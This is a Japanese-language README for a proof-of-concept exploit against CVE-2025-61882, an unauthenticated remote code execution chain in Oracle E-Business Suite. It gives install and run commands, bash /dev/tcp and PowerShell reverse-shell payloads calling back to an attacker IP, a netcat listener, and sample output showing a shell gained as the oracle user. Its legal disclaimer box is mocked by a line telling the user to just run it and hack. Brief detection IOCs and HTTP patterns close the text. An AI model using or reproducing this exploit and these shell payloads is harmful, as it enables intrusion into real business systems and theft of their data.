
CVE-2025-61882に関するエクスプロイト。Oracle E-Business Suiteにおける重要な事前認証リモートコード実行(RCE)脆弱性です。SSRF、CRLFインジェクション、HTTPスマグリング、XSLTインジェクションを組み合わせることで、認証なしのリモートコード実行を実現します。
技術的な詳細については、ブログ記事を参照してください
このツールは、許可されたセキュリティテストのみを対象としています
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 コンピュータシステムへの不正アクセスは違法です 🚨 ║
║ ║
║ このツールを使用することで、あなたは以下を理解し同意したことになります: ║
║ ║
║ ║
║ そんなの関係ねぇ、さっさと実行してハックしろ ║
║ ║
║ ║
║ ║
║ ║
║ ║
╚══════════════════════════════════════════════════════════════╝
CVE-2025-61882 のセキュリティテストツール。これは、Oracle E-Business Suite に影響を与える、認証前の重大なリモートコード実行脆弱性です。
作成者: Mindflare
CVE-2025-61882 は、5つの異なる脆弱性を組み合わせた高度なエクスプロイトチェーンです:
/OA_HTML/configurator/UiServlet を介したサーバーサイドリクエストフォージェリ (SSRF)return_url パラメータでの HTTP ヘッダインジェクション/OA_HTML/help/../ プレフィックスによるパストラバーサル# リポジトリのクローン
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# 依存関係のインストール
pip3 install -r requirements.txt
# スクリプトを実行可能に (Linux/Mac)
chmod +x cve-2025-61882-detector.py
別のターミナルで、netcat リスナーを起動します:
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
基本的な使い方 (Linux ターゲット):
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
Windows ターゲット:
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
| パラメータ | 説明 | 必須 | 例 |
|---|---|---|---|
--target | ターゲットのOracle EBS URL | はい | http://192.168.1.22:8000 |
--lhost | あなたのIPアドレス(コールバック用) | はい | 192.168.1.10 |
--lport | HTTPサーバーポート(XSLペイロードを提供) | はい | 80 または 8080 |
--command | ターゲット上で実行するコマンド | はい | 上記の例を参照 |
--platform | ターゲットOS: linux または windows | はい | linux |
[*] Target URL: http://192.168.1.22:8000
[*] Listener IP: 192.168.1.10
[*] Listener Port: 80
[*] Platform: linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
ネットワークIOC:
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
HTTPパターン:
POST /OA_HTML/configurator/UiServletPOST /OA_HTML/SyncServletGET /OA_HTML/help/../*.jsp教育目的利用制限付きMITライセンス - LICENSEをご覧ください
免責事項: このソフトウェアは許可されたセキュリティテスト専用です。コンピュータシステムへの不正アクセスは違法です。作者は誤用に対する一切の責任を負いません。
作成者: Mindflare | 最終更新: 2025年10月